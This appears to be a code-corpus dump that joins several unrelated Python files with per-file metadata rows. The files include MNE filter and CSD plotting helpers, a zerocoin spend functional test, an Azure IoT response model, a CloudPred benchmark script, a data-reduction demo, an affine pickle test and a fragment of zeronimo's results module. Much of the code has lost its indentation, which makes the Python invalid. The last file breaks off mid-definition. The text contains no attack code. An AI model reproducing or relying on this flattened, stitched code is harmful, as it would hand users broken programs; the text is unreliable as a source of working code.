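    Examples
    --------
    A short sketch (the dipole file name is a placeholder)::
        >>> from mne import read_dipole  # doctest: +SKIP
        >>> dip = read_dipole('sample_dipoles.dip')  # doctest: +SKIP
        >>> plot_dipole_amplitudes([dip])  # doctest: +SKIP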
"""
import matplotlib.pyplot as plt
if colors is None:
colors = cycle(_get_color_list())
fig, ax = plt.subplots(1, 1)
xlim = [np.inf, -np.inf]
for dip, color in zip(dipoles, colors):
ax.plot(dip.times, dip.amplitude * 1e9, color=color, linewidth=1.5)
xlim[0] = min(xlim[0], dip.times[0])
xlim[1] = max(xlim[1], dip.times[-1])
ax.set(xlim=xlim, xlabel='Time (s)', ylabel='Amplitude (nAm)')
if show:
fig.show(warn=False)
return fig
def adjust_axes(axes, remove_spines=('top', 'right'), grid=True):
"""Adjust some properties of axes.
Parameters
----------
axes : list
List of axes to process.
remove_spines : list of str
Which axis spines to remove.
grid : bool
Turn grid on (True) or off (False).
"""
axes = [axes] if not isinstance(axes, (list, tuple, np.ndarray)) else axes
for ax in axes:
if grid:
ax.grid(zorder=0)
for key in remove_spines:
ax.spines[key].set_visible(False)
def _filter_ticks(lims, fscale):
"""Create approximately spaced ticks between lims."""
if fscale == 'linear':
return None, None # let matplotlib handle it
lims = np.array(lims)
ticks = list()
if lims[1] > 20 * lims[0]:
base = np.array([1, 2, 4])
else:
base = np.arange(1, 11)
for exp in range(int(np.floor(np.log10(lims[0]))),
int(np.floor(np.log10(lims[1]))) + 1):
ticks += (base * (10 ** exp)).tolist()
ticks = np.array(ticks)
ticks = ticks[(ticks >= lims[0]) & (ticks <= lims[1])]
ticklabels = [('%g' if t < 1 else '%d') % t for t in ticks]
return ticks, ticklabels
def _get_flim(flim, fscale, freq, sfreq=None):
"""Get reasonable frequency limits."""
if flim is None:
if freq is None:
flim = [0.1 if fscale == 'log' else 0., sfreq / 2.]
else:
if fscale == 'linear':
flim = [freq[0]]
else:
flim = [freq[0] if freq[0] > 0 else 0.1 * freq[1]]
flim += [freq[-1]]
if fscale == 'log':
if flim[0] <= 0:
raise ValueError('flim[0] must be positive, got %s' % flim[0])
elif flim[0] < 0:
raise ValueError('flim[0] must be non-negative, got %s' % flim[0])
return flim
def _check_fscale(fscale):
"""Check for valid fscale."""
if not isinstance(fscale, str) or fscale not in ('log', 'linear'):
raise ValueError('fscale must be "log" or "linear", got %s'
% (fscale,))
_DEFAULT_ALIM = (-80, 10)
def plot_filter(h, sfreq, freq=None, gain=None, title=None, color='#1f77b4',
flim=None, fscale='log', alim=_DEFAULT_ALIM, show=True,
compensate=False, plot=('time', 'magnitude', 'delay'),
axes=None):
"""Plot properties of a filter.
Parameters
----------
h : dict or ndarray
An IIR dict or 1D ndarray of coefficients (for FIR filter).
sfreq : float
Sample rate of the data (Hz).
freq : array-like or None
The ideal response frequencies to plot (must be in ascending order).
If None (default), do not plot the ideal response.
gain : array-like or None
The ideal response gains to plot.
If None (default), do not plot the ideal response.
title : str | None
The title to use. If None (default), determine the title based
on the type of the system.
color : color object
The color to use (default '#1f77b4').
flim : tuple or None
If not None, the x-axis frequency limits (Hz) to use.
If None, freq will be used. If None (default) and freq is None,
``(0.1, sfreq / 2.)`` will be used.
fscale : str
Frequency scaling to use, can be "log" (default) or "linear".
alim : tuple
        The y-axis amplitude limits (dB) to use (default: (-80, 10)).
show : bool
Show figure if True (default).
compensate : bool
If True, compensate for the filter delay (phase will not be shown).
- For linear-phase FIR filters, this visualizes the filter coefficients
assuming that the output will be shifted by ``N // 2``.
- For IIR filters, this changes the filter coefficient display
by filtering backward and forward, and the frequency response
by squaring it.
.. versionadded:: 0.18
plot : list | tuple | str
A list of the requested plots from ``time``, ``magnitude`` and
``delay``. Default is to plot all three filter properties
('time', 'magnitude', 'delay').
.. versionadded:: 0.21.0
axes : instance of Axes | list | None
The axes to plot to. If list, the list must be a list of Axes of
the same length as the number of requested plot types. If instance of
Axes, there must be only one filter property plotted.
Defaults to ``None``.
.. versionadded:: 0.21.0
Returns
-------
fig : matplotlib.figure.Figure
The figure containing the plots.
See Also
--------
mne.filter.create_filter
plot_ideal_filter
Notes
-----
.. versionadded:: 0.14
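    Examples
    --------
    A minimal sketch using a plain FIR coefficient array (the filter design
    below is an arbitrary SciPy choice, not an MNE default)::
        >>> from scipy.signal import firwin  # doctest: +SKIP
        >>> h = firwin(101, 40., fs=1000.)  # doctest: +SKIP
        >>> plot_filter(h, sfreq=1000.)  # doctest: +SKIP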
"""
from scipy.signal import (
freqz, group_delay, lfilter, filtfilt, sosfilt, sosfiltfilt)
import matplotlib.pyplot as plt
sfreq = float(sfreq)
_check_option('fscale', fscale, ['log', 'linear'])
if isinstance(plot, str):
plot = [plot]
for xi, x in enumerate(plot):
_check_option('plot[%d]' % xi, x, ('magnitude', 'delay', 'time'))
flim = _get_flim(flim, fscale, freq, sfreq)
if fscale == 'log':
omega = np.logspace(np.log10(flim[0]), np.log10(flim[1]), 1000)
else:
omega = np.linspace(flim[0], flim[1], 1000)
xticks, xticklabels = _filter_ticks(flim, fscale)
omega /= sfreq / (2 * np.pi)
    if isinstance(h, dict):  # IIR filter (dict; possibly second-order sections)
if 'sos' in h:
H = np.ones(len(omega), np.complex128)
gd = np.zeros(len(omega))
for section in h['sos']:
this_H = freqz(section[:3], section[3:], omega)[1]
H *= this_H
if compensate:
H *= this_H.conj() # time reversal is freq conj
else:
# Assume the forward-backward delay zeros out, which it
# mostly should
with warnings.catch_warnings(record=True): # singular GD
warnings.simplefilter('ignore')
gd += group_delay((section[:3], section[3:]), omega)[1]
n = estimate_ringing_samples(h['sos'])
delta = np.zeros(n)
delta[0] = 1
if compensate:
delta = np.pad(delta, [(n - 1, 0)], 'constant')
func = sosfiltfilt
gd += (len(delta) - 1) // 2
else:
func = sosfilt
h = func(h['sos'], delta)
else:
H = freqz(h['b'], h['a'], omega)[1]
if compensate:
H *= H.conj()
with warnings.catch_warnings(record=True): # singular GD
warnings.simplefilter('ignore')
gd = group_delay((h['b'], h['a']), omega)[1]
                if compensate:
                    gd += group_delay((h['b'].conj(), h['a'].conj()),
                                      omega)[1]
n = estimate_ringing_samples((h['b'], h['a']))
delta = np.zeros(n)
delta[0] = 1
if compensate:
delta = np.pad(delta, [(n - 1, 0)], 'constant')
func = filtfilt
else:
func = lfilter
h = func(h['b'], h['a'], delta)
if title is None:
title = 'SOS (IIR) filter'
if compensate:
title += ' (forward-backward)'
else:
H = freqz(h, worN=omega)[1]
with warnings.catch_warnings(record=True): # singular GD
warnings.simplefilter('ignore')
gd = group_delay((h, [1.]), omega)[1]
title = 'FIR filter' if title is None else title
if compensate:
title += ' (delay-compensated)'
fig = None
if axes is None:
fig, axes = plt.subplots(len(plot), 1)
if isinstance(axes, plt.Axes):
axes = [axes]
elif isinstance(axes, np.ndarray):
axes = list(axes)
if fig is None:
fig = axes[0].get_figure()
if len(axes) != len(plot):
raise ValueError('Length of axes (%d) must be the same as number of '
'requested filter properties (%d)'
% (len(axes), len(plot)))
t = np.arange(len(h))
dlim = np.abs(t).max() / 2.
dlim = [-dlim, dlim]
if compensate:
n_shift = (len(h) - 1) // 2
t -= n_shift
assert t[0] == -t[-1]
gd -= n_shift
t = t / sfreq
gd = gd / sfreq
f = omega * sfreq / (2 * np.pi)
sl = slice(0 if fscale == 'linear' else 1, None, None)
mag = 10 * np.log10(np.maximum((H * H.conj()).real, 1e-20))
if 'time' in plot:
ax_time_idx = np.where([p == 'time' for p in plot])[0][0]
axes[ax_time_idx].plot(t, h, color=color)
axes[ax_time_idx].set(xlim=t[[0, -1]], xlabel='Time (s)',
ylabel='Amplitude', title=title)
# Magnitude
if 'magnitude' in plot:
ax_mag_idx = np.where([p == 'magnitude' for p in plot])[0][0]
axes[ax_mag_idx].plot(f[sl], mag[sl], color=color,
linewidth=2, zorder=4)
if freq is not None and gain is not None:
plot_ideal_filter(freq, gain, axes[ax_mag_idx],
fscale=fscale, show=False)
axes[ax_mag_idx].set(ylabel='Magnitude (dB)', xlabel='', xscale=fscale)
if xticks is not None:
axes[ax_mag_idx].set(xticks=xticks)
axes[ax_mag_idx].set(xticklabels=xticklabels)
axes[ax_mag_idx].set(xlim=flim, ylim=alim, xlabel='Frequency (Hz)',
ylabel='Amplitude (dB)')
# Delay
if 'delay' in plot:
ax_delay_idx = np.where([p == 'delay' for p in plot])[0][0]
axes[ax_delay_idx].plot(f[sl], gd[sl], color=color,
linewidth=2, zorder=4)
# shade nulled regions
for start, stop in zip(*_mask_to_onsets_offsets(mag <= -39.9)):
axes[ax_delay_idx].axvspan(f[start], f[stop - 1],
facecolor='k', alpha=0.05,
zorder=5)
axes[ax_delay_idx].set(xlim=flim, ylabel='Group delay (s)',
xlabel='Frequency (Hz)',
xscale=fscale)
if xticks is not None:
axes[ax_delay_idx].set(xticks=xticks)
axes[ax_delay_idx].set(xticklabels=xticklabels)
axes[ax_delay_idx].set(xlim=flim, ylim=dlim, xlabel='Frequency (Hz)',
ylabel='Delay (s)')
adjust_axes(axes)
tight_layout()
plt_show(show)
return fig
def plot_ideal_filter(freq, gain, axes=None, title='', flim=None, fscale='log',
alim=_DEFAULT_ALIM, color='r', alpha=0.5, linestyle='--',
show=True):
"""Plot an ideal filter response.
Parameters
----------
freq : array-like
The ideal response frequencies to plot (must be in ascending order).
gain : array-like or None
The ideal response gains to plot.
axes : instance of Axes | None
The subplot handle. With None (default), axes are created.
title : str
The title to use, (default: '').
flim : tuple or None
If not None, the x-axis frequency limits (Hz) to use.
        If None (default), freq is used.
fscale : str
Frequency scaling to use, can be "log" (default) or "linear".
alim : tuple
If not None (default), the y-axis limits (dB) to use.
color : color object
The color to use (default: 'r').
alpha : float
The alpha to use (default: 0.5).
linestyle : str
The line style to use (default: '--').
show : bool
Show figure if True (default).
Returns
-------
fig : instance of matplotlib.figure.Figure
The figure.
See Also
--------
plot_filter
Notes
-----
.. versionadded:: 0.14
Examples
--------
Plot a simple ideal band-pass filter::
>>> from mne.viz import plot_ideal_filter
>>> freq = [0, 1, 40, 50]
>>> gain = [0, 1, 1, 0]
>>> plot_ideal_filter(freq, gain, flim=(0.1, 100)) #doctest: +ELLIPSIS
<...Figure...>
"""
import matplotlib.pyplot as plt
my_freq, my_gain = list(), list()
if freq[0] != 0:
raise ValueError('freq should start with DC (zero) and end with '
'Nyquist, but got %s for DC' % (freq[0],))
freq = np.array(freq)
# deal with semilogx problems @ x=0
_check_option('fscale', fscale, ['log', 'linear'])
if fscale == 'log':
freq[0] = 0.1 * freq[1] if flim is None else min(flim[0], freq[1])
flim = _get_flim(flim, fscale, freq)
transitions = list()
for ii in range(len(freq)):
if ii < len(freq) - 1 and gain[ii] != gain[ii + 1]:
transitions += [[freq[ii], freq[ii + 1]]]
my_freq += np.linspace(freq[ii], freq[ii + 1], 20,
endpoint=False).tolist()
my_gain += np.linspace(gain[ii], gain[ii + 1], 20,
endpoint=False).tolist()
else:
my_freq.append(freq[ii])
my_gain.append(gain[ii])
my_gain = 10 * np.log10(np.maximum(my_gain, 10 ** (alim[0] / 10.)))
if axes is None:
axes = plt.subplots(1)[1]
for transition in transitions:
axes.axvspan(*transition, color=color, alpha=0.1)
axes.plot(my_freq, my_gain, color=color, linestyle=linestyle, alpha=0.5,
linewidth=4, zorder=3)
xticks, xticklabels = _filter_ticks(flim, fscale)
axes.set(ylim=alim, xlabel='Frequency (Hz)', ylabel='Amplitude (dB)',
xscale=fscale)
if xticks is not None:
axes.set(xticks=xticks)
axes.set(xticklabels=xticklabels)
axes.set(xlim=flim)
if title:
axes.set(title=title)
adjust_axes(axes)
tight_layout()
plt_show(show)
return axes.figure
def _handle_event_colors(color_dict, unique_events, event_id):
"""Create event-integer-to-color mapping, assigning defaults as needed."""
default_colors = dict(zip(sorted(unique_events), cycle(_get_color_list())))
# warn if not enough colors
if color_dict is None:
if len(unique_events) > len(_get_color_list()):
warn('More events than default colors available. You should pass '
'a list of unique colors.')
else:
custom_colors = dict()
for key, color in color_dict.items():
if key in unique_events: # key was a valid event integer
custom_colors[key] = color
elif key in event_id: # key was an event label
custom_colors[event_id[key]] = color
else: # key not a valid event, warn and ignore
warn('Event ID %s is in the color dict but is not '
'present in events or event_id.' % str(key))
# warn if color_dict is missing any entries
unassigned = sorted(set(unique_events) - set(custom_colors))
if len(unassigned):
unassigned_str = ', '.join(str(e) for e in unassigned)
warn('Color was not assigned for event%s %s. Default colors will '
'be used.' % (_pl(unassigned), unassigned_str))
default_colors.update(custom_colors)
return default_colors
def plot_csd(csd, info=None, mode='csd', colorbar=True, cmap=None,
n_cols=None, show=True):
"""Plot CSD matrices.
A sub-plot is created for each frequency. If an info object is passed to
the function, different channel types are plotted in different figures.
Parameters
----------
csd : instance of CrossSpectralDensity
The CSD matrix to plot.
info : instance of Info | None
To split the figure by channel-type, provide the measurement info.
By default, the CSD matrix is plotted as a whole.
mode : 'csd' | 'coh'
Whether to plot the cross-spectral density ('csd', the default), or
the coherence ('coh') between the channels.
colorbar : bool
Whether to show a colorbar. Defaults to ``True``.
cmap : str | None
The matplotlib colormap to use. Defaults to None, which means the
colormap will default to matplotlib's default.
n_cols : int | None
CSD matrices are plotted in a grid. This parameter controls how
many matrix to plot side by side before starting a new row. By
default, a number will be chosen to make the grid as square as
possible.
show : bool
Whether to show the figure. Defaults to ``True``.
Returns
-------
fig : list of Figure
The figures created by this function.
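    Examples
    --------
    A short sketch (assumes ``csd`` was computed beforehand, e.g. with
    :func:`mne.time_frequency.csd_morlet` on an Epochs object)::
        >>> plot_csd(csd, mode='coh')  # doctest: +SKIP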
"""
import matplotlib.pyplot as plt
if mode not in ['csd', 'coh']:
raise ValueError('"mode" should be either "csd" or "coh".')
if info is not None:
info_ch_names = info['ch_names']
sel_eeg = pick_types(info, meg=False, eeg=True, ref_meg=False,
exclude=[])
sel_mag = pick_types(info, meg='mag', eeg=False, ref_meg=False,
exclude=[])
sel_grad = pick_types(info, meg='grad', eeg=False, ref_meg=False,
exclude=[])
idx_eeg = [csd.ch_names.index(info_ch_names[c])
for c in sel_eeg if info_ch_names[c] in csd.ch_names]
idx_mag = [csd.ch_names.index(info_ch_names[c])
for c in sel_mag if info_ch_names[c] in csd.ch_names]
idx_grad = [csd.ch_names.index(info_ch_names[c])
for c in sel_grad if info_ch_names[c] in csd.ch_names]
indices = [idx_eeg, idx_mag, idx_grad]
titles = ['EEG', 'Magnetometers', 'Gradiometers']
if mode == 'csd':
# The units in which to plot the CSD
units = dict(eeg='µV²', grad='fT²/cm²', mag='fT²')
scalings = dict(eeg=1e12, grad=1e26, mag=1e30)
else:
indices = [np.arange(len(csd.ch_names))]
if mode == 'csd':
titles = ['Cross-spectral density']
# Units and scaling unknown
units = dict()
scalings = dict()
elif mode == 'coh':
titles = ['Coherence']
n_freqs = len(csd.frequencies)
if n_cols is None:
n_cols = int(np.ceil(np.sqrt(n_freqs)))
n_rows = int(np.ceil(n_freqs / float(n_cols)))
figs = []
for ind, title, ch_type in zip(indices, titles, ['eeg', 'mag', 'grad']):
if len(ind) == 0:
continue
fig, axes = plt.subplots(n_rows, n_cols, squeeze=False,
figsize=(2 * n_cols + 1, 2.2 * n_rows))
csd_mats = []
for i in range(len(csd.frequencies)):
cm = csd.get_data(index=i)[ind][:, ind]
if mode == 'csd':
cm = np.abs(cm) * scalings.get(ch_type, 1)
elif mode == 'coh':
# Compute coherence from the CSD matrix
psd = np.diag(cm).real
cm = np.abs(cm) ** 2 / psd[np.newaxis, :] / psd[:, np.newaxis]
csd_mats.append(cm)
vmax = np.max(csd_mats)
for i, (freq, mat) in enumerate(zip(csd.frequencies, csd_mats)):
ax = axes[i // n_cols][i % n_cols]
im = ax.imshow(mat, interpolation='nearest', cmap=cmap, vmin=0,
vmax=vmax)
ax.set_xticks([])
ax.set_yticks([])
if csd._is_sum:
ax.set_title('%.1f-%.1f Hz.' % (np.min(freq),
np.max(freq)))
else:
ax.set_title('%.1f Hz.' % freq)
plt.suptitle(title)
plt.subplots_adjust(top=0.8)
if colorbar:
cb = plt.colorbar(im, ax=[a for ax_ in axes for a in ax_])
if mode == 'csd':
label = u'CSD'
if ch_type in units:
label += u' (%s)' % units[ch_type]
cb.set_label(label)
elif mode == 'coh':
cb.set_label('Coherence')
figs.append(fig)
plt_show(show)
return figs
| 37.417305 | 79 | 0.572595 | [
"BSD-3-Clause"
] | Aniket-Pradhan/mne-python | mne/viz/misc.py | 48,875 | Python |
#!/usr/bin/env python3
# Copyright (c) 2019-2020 The PIVX developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
'''
Tests v2, v3 and v4 Zerocoin Spends
'''
from time import sleep
from test_framework.authproxy import JSONRPCException
from test_framework.test_framework import PnyTestFramework
from test_framework.util import (
sync_blocks,
assert_equal,
assert_raises_rpc_error,
set_node_times,
DecimalAmt
)
class ZerocoinSpendTest(PnyTestFramework):
def set_test_params(self):
self.num_nodes = 3
# node 0 and node 1 move the chain (node 0 also sets the sporks)
# node 2 does the spends
self.extra_args = [[]]*self.num_nodes
self.extra_args[0].append('-sporkkey=932HEevBSujW2ud7RfB1YF91AFygbBRQj3de3LyaCRqNzKKgWXi')
def setup_chain(self):
# Start with PoS cache: 330 blocks
self._initialize_chain(toPosPhase=True)
self.enable_mocktime()
def log_title(self):
title = "*** Starting %s ***" % self.__class__.__name__
underline = "-" * len(title)
description = "Tests v2, v3 and v4 Zerocoin Spends."
self.log.info("\n\n%s\n%s\n%s\n", title, underline, description)
def setV4SpendEnforcement(self, fEnable=True):
sporkName = "SPORK_18_ZEROCOIN_PUBLICSPEND_V4"
# update spork 18 with node[0]
if fEnable:
self.log.info("Enabling v4 PublicSpend version with SPORK 18...")
res = self.activate_spork(0, sporkName)
else:
self.log.info("Enabling v3 PublicSpend version with SPORK 18...")
res = self.deactivate_spork(0, sporkName)
assert_equal(res, "success")
sleep(1)
# check that node[1] receives it
assert_equal(fEnable, self.is_spork_active(1, sporkName))
self.log.info("done")
def run_test(self):
def get_zerocoin_data(coin):
return coin["s"], coin["r"], coin["k"], coin["id"], coin["d"], coin["t"]
def check_balances(denom, zpny_bal, pny_bal):
zpny_bal -= denom
assert_equal(self.nodes[2].getzerocoinbalance()['Total'], zpny_bal)
pny_bal += denom
wi = self.nodes[2].getwalletinfo()
assert_equal(wi['balance'] + wi['immature_balance'], pny_bal)
return zpny_bal, pny_bal
def stake_4_blocks(block_time):
for peer in range(2):
for i in range(2):
block_time = self.generate_pos(peer, block_time)
sync_blocks(self.nodes)
return block_time
self.log_title()
block_time = self.mocktime
set_node_times(self.nodes, block_time)
# Start with cache balances
wi = self.nodes[2].getwalletinfo()
balance = wi['balance'] + wi['immature_balance']
zpny_balance = self.nodes[2].getzerocoinbalance()['Total']
assert_equal(balance, DecimalAmt(13833.92))
assert_equal(zpny_balance, 6666)
# Export zerocoin data
listmints = self.nodes[2].listmintedzerocoins(True, True)
serial_ids = [mint["serial hash"] for mint in listmints]
exported_zerocoins = [x for x in self.nodes[2].exportzerocoins(False) if x["id"] in serial_ids]
exported_zerocoins.sort(key=lambda x: x["d"], reverse=False)
assert_equal(8, len(exported_zerocoins))
# 1) stake more blocks - save a v3 spend for later (serial_1)
serial_1, randomness_1, privkey_1, id_1, denom_1, tx_1 = get_zerocoin_data(exported_zerocoins[1])
self.log.info("Staking 70 blocks to get to public spend activation")
for j in range(5):
for peer in range(2):
for i in range(7):
block_time = self.generate_pos(peer, block_time)
sync_blocks(self.nodes)
old_spend_v3 = self.nodes[2].createrawzerocoinspend(id_1)
# 2) Spend one minted coin - spend v3 (serial_2)
serial_2, randomness_2, privkey_2, id_2, denom_2, tx_2 = get_zerocoin_data(exported_zerocoins[2])
self.log.info("Spending the minted coin with serial %s..." % serial_2[:16])
txid = self.nodes[2].spendzerocoinmints([id_2])['txid']
# stake 4 blocks - check it gets included on chain and check balances
block_time = stake_4_blocks(block_time)
self.check_tx_in_chain(0, txid)
zpny_balance, balance = check_balances(denom_2, zpny_balance, balance)
self.log.info("--> VALID PUBLIC COIN SPEND (v3) PASSED")
# 3) Check double spends - spend v3
self.log.info("Trying to spend the serial twice now...")
assert_raises_rpc_error(-4, "Trying to spend an already spent serial",
self.nodes[2].spendrawzerocoin, serial_2, randomness_2, denom_2, privkey_2, "", tx_2)
# 4) Activate v4 spends with SPORK_18
self.setV4SpendEnforcement()
# 5) Spend one minted coin - spend v4 (serial_3)
serial_3, randomness_3, privkey_3, id_3, denom_3, tx_3 = get_zerocoin_data(exported_zerocoins[3])
self.log.info("Spending the minted coin with serial %s..." % serial_3[:16])
txid = self.nodes[2].spendzerocoinmints([id_3])['txid']
# stake 4 blocks - check it gets included on chain and check balances
block_time = stake_4_blocks(block_time)
self.check_tx_in_chain(0, txid)
zpny_balance, balance = check_balances(denom_3, zpny_balance, balance)
self.log.info("--> VALID PUBLIC COIN SPEND (v4) PASSED")
# 6) Check double spends - spend v4
self.log.info("Trying to spend the serial twice now...")
assert_raises_rpc_error(-4, "Trying to spend an already spent serial",
self.nodes[2].spendrawzerocoin, serial_3, randomness_3, denom_3, privkey_3, "", tx_3)
# 7) Try to relay old v3 spend now (serial_1)
self.log.info("Trying to send old v3 spend now...")
assert_raises_rpc_error(-26, "bad-txns-invalid-zpny",
self.nodes[2].sendrawtransaction, old_spend_v3)
self.log.info("GOOD: Old transaction not sent.")
# 8) Try to double spend with v4 a mint already spent with v3 (serial_2)
self.log.info("Trying to double spend v4 against v3...")
assert_raises_rpc_error(-4, "Trying to spend an already spent serial",
self.nodes[2].spendrawzerocoin, serial_2, randomness_2, denom_2, privkey_2, "", tx_2)
self.log.info("GOOD: Double-spending transaction did not verify.")
# 9) Reactivate v3 spends and try to spend the old saved one (serial_1) again
self.setV4SpendEnforcement(False)
self.log.info("Trying to send old v3 spend now (serial: %s...)" % serial_1[:16])
txid = self.nodes[2].sendrawtransaction(old_spend_v3)
# stake 4 blocks - check it gets included on chain and check balances
_ = stake_4_blocks(block_time)
self.check_tx_in_chain(0, txid)
# need to reset spent mints since this was a raw broadcast
self.nodes[2].resetmintzerocoin()
_, _ = check_balances(denom_1, zpny_balance, balance)
self.log.info("--> VALID PUBLIC COIN SPEND (v3) PASSED")
if __name__ == '__main__':
ZerocoinSpendTest().main()
| 43.775148 | 117 | 0.643687 | [
"MIT"
] | pw512/peony | test/functional/wallet_zerocoin_publicspends.py | 7,398 | Python |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class ConfigurationQueriesTestResponse(Model):
"""ConfigurationQueriesTestResponse.
:param target_condition_error:
:type target_condition_error: str
:param custom_metric_query_errors:
:type custom_metric_query_errors: dict[str, str]
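    Example (a sketch only; the keyword names mirror the attributes above and
    the values shown are placeholders)::
        response = ConfigurationQueriesTestResponse(
            target_condition_error=None,
            custom_metric_query_errors={'queryName': 'error message'})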
"""
_attribute_map = {
'target_condition_error': {'key': 'targetConditionError', 'type': 'str'},
'custom_metric_query_errors': {'key': 'customMetricQueryErrors', 'type': '{str}'},
}
def __init__(self, **kwargs):
super(ConfigurationQueriesTestResponse, self).__init__(**kwargs)
self.target_condition_error = kwargs.get('target_condition_error', None)
self.custom_metric_query_errors = kwargs.get('custom_metric_query_errors', None)
| 38.121212 | 90 | 0.645469 | [
"MIT"
] | Jackbk/azure-iot-cli-extension | azext_iot/sdk/iothub/service/models/configuration_queries_test_response.py | 1,258 | Python |
########################################################
# run_tp.py
# Author: Jamie Zhu <jimzhu@GitHub>
# Created: 2014/2/6
# Last updated: 2014/5/8
# Implemented approach: CloudPred
# Evaluation metrics: MAE, NMAE, RMSE, MRE, NPRE
########################################################
import numpy as np
import os, sys, time
import multiprocessing
sys.path.append('src')
# Build external model
if not os.path.isfile('src/core.so'):
print 'Lack of core.so (built from the C++ module).'
print 'Please first build the C++ code into core.so by using: '
print '>> python setup.py build_ext --inplace'
sys.exit()
from utilities import *
import evaluator
import dataloader
#########################################################
# config area
#
para = {'dataType': 'tp', # set the dataType as 'rt' or 'tp'
'dataPath': '../data/dataset#1/',
'outPath': 'result/',
'metrics': ['MAE', 'NMAE', 'RMSE', 'MRE', 'NPRE'], # delete where appropriate
'density': list(np.arange(0.05, 0.31, 0.05)), # matrix density
'rounds': 20, # how many runs are performed at each matrix density
'dimension': 20, # dimenisionality of the latent factors
'lambda': 800, # regularization parameter
'topK': 10, # the parameter of TopK similar users or services, the default value is
# topK = 10 as in the reference paper
'weight': 0.5, # the combination weight of UPCC and IPCC, the default value is
# weight = 0.5 as in the reference paper
'maxIter': 300, # the max iterations
'saveTimeInfo': False, # whether to keep track of the running time
'saveLog': False, # whether to save log into file
'debugMode': False, # whether to record the debug info
'parallelMode': True # whether to leverage multiprocessing for speedup
}
initConfig(para)
#########################################################
startTime = time.clock() # start timing
logger.info('==============================================')
logger.info('CloudPred: [Zhang et al, SRDS\'2011].')
# load the dataset
dataMatrix = dataloader.load(para)
logger.info('Loading data done.')
# run for each density
if para['parallelMode']: # run on multiple processes
pool = multiprocessing.Pool()
for density in para['density']:
pool.apply_async(evaluator.execute, (dataMatrix, density, para))
pool.close()
pool.join()
else: # run on single processes
for density in para['density']:
evaluator.execute(dataMatrix, density, para)
logger.info(time.strftime('All done. Total running time: %d-th day - %Hhour - %Mmin - %Ssec.',
time.gmtime(time.clock() - startTime)))
logger.info('==============================================')
sys.path.remove('src')
| 36.040541 | 94 | 0.608549 | [
"MIT"
] | YuwenXiong/WS-DREAM | benchmarks/hybrid/CloudPred/run_tp.py | 2,667 | Python |
"""This code demonstrates how to perform the tested data reduction module.
"""
import os
import sys
import glob
import pyabf
import matplotlib.pyplot as plt
pathToHere = os.path.abspath(os.path.dirname(__file__))
pathToData = os.path.abspath(pathToHere + "/../data/")
pathToModule = os.path.abspath(pathToHere + "/../../src/")
sys.path.insert(0, pathToModule)
import drtest as dr
for file in sorted(glob.glob(pathToData + "/*.abf")):
abf = pyabf.ABF(file)
abf.setSweep(4, 1)
xdata = abf.sweepX
ydata = abf.sweepY
da = dr.DataAnalysis(xdata, ydata)
xdec, ydec = da.data_reduction(method='decimate', reduction_factor=4)
xavr, yavr = da.data_reduction(method='average', reduction_factor=4)
xmin, ymin = da.data_reduction(method='min', reduction_factor=4)
xmax, ymax = da.data_reduction(method='max', reduction_factor=4)
xminmax, yminmax = da.data_reduction(method='min/max', reduction_factor=4)
xxxx = [xdec, xavr, xmin, xmax, xminmax]
yyyy = [ydec, yavr, ymin, ymax, yminmax]
## 2D plot
# plt.plot(xdec, ydec)
# plt.plot(xavr, yavr)
# plt.plot(xmin, ymin)
# plt.plot(xmax, ymax)
# plt.show()
## 3D plot
fig = plt.figure()
ax = fig.gca(projection='3d')
zs = [i for i in range(0, 6)]
ax.plot(xdata, ydata, zs[0], zdir='y', color='black', linewidth=1.5)
ax.plot(xdec, ydec, zs[1], zdir='y', color='red', linewidth=1.5)
ax.plot(xavr, yavr, zs[2], zdir='y', color='green', linewidth=1.5)
ax.plot(xmin, ymin, zs[3], zdir='y', color='orange', linewidth=1.5)
ax.plot(xmax, ymax, zs[4], zdir='y', color='blue', linewidth=1.5)
ax.plot(xminmax, yminmax, zs[5], zdir='y', color='brown', linewidth=1.5)
zlabels = [' ', 'raw data', 'decimate', 'average', 'minimum', 'maximum', 'min/max']
ax.set_xlabel('Time (s)', fontweight='bold', fontsize='medium')
ax.set_zlabel('Voltage (mV)', fontweight='bold', fontsize='medium')
ax.set_yticklabels(zlabels, rotation=-15, verticalalignment='baseline', horizontalalignment='left', fontweight='bold')
for angle in range(0, 360):
ax.view_init(25, angle)
plt.draw()
plt.pause(.0001) | 35.692308 | 123 | 0.608621 | [
"MIT"
] | MS44neuro/drtest | examples/scripts/data_reduction_ex1.py | 2,320 | Python |
"""
Validate that instances of `affine.Affine()` can be pickled and unpickled.
"""
import pickle
from multiprocessing import Pool
import affine
def test_pickle():
a = affine.Affine(1, 2, 3, 4, 5, 6)
assert pickle.loads(pickle.dumps(a)) == a
def _mp_proc(x):
# A helper function - needed for test_with_multiprocessing()
# Can't be defined inside the test because multiprocessing needs
# everything to be in __main__
assert isinstance(x, affine.Affine)
return x
def test_with_multiprocessing():
a1 = affine.Affine(1, 2, 3, 4, 5, 6)
a2 = affine.Affine(6, 5, 4, 3, 2, 1)
results = Pool(2).map(_mp_proc, [a1, a2])
for expected, actual in zip([a1, a2], results):
assert expected == actual
| 24 | 74 | 0.668011 | [
"MIT"
] | Con-Mi/lambda-packs | Lxml_requests/source/affine/tests/test_pickle.py | 744 | Python |
# -*- coding: utf-8 -*-
"""
zeronimo.results
~~~~~~~~~~~~~~~~
:copyright: (c) 2013-2017 by Heungsub Lee
:license: BSD, see LICENSE for more details.
"""
from __future__ import absolute_import
from binascii import hexlify
from gevent.event import AsyncResult
from gevent.queue import Queue
from zeronimo.exceptions import TaskClosed
from zeronimo.helpers import make_repr
from zeronimo.messaging import BREAK, DONE, RAISE, RETURN, YIELD
__all__ = ['RemoteResult', 'RemoteException', 'RemoteIterator']
class RemoteResult(AsyncResult):
"""The task object.
:param customer: the customer object.
:param id: the task identifier.
:param invoker_id: the identifier of the invoker which spawned this task.
:param worker_info: the value the worker sent at accepting.
"""
def __init__(self, collector, call_id, task_id, worker_info=None):
super(RemoteResult, self).__init__()
self.collector = collector
self.call_id = call_id
self.task_id = task_id
self.worker_info = worker_info
def close(self):
"""Stops to collect replies from its task."""
self.set_exception(TaskClosed)
self.collector.remove_result(self)
# iterator
_iterator = False
def is_iterator(self):
return self._iterator
def set_iterator(self):
